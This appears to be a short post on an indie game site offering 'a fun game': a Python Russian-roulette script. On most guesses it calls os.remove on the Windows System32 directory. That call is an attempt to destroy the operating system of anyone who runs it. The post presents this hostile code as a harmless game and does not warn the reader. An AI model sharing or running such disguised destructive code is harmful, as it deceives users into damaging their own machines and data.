Skip to main content

Indie game storeFree gamesFun gamesHorror games
Game developmentAssetsComics
SalesBundles
Jobs
TagsGame Engines

heres a fun game:

import os, random

bullet = random.randint(1,6)


fate = input("Your turn.")

fate = int(fate)


if fate == bullet:

    print("Ok, my turn.")

else:

    os.remove("C:\Windows\System32")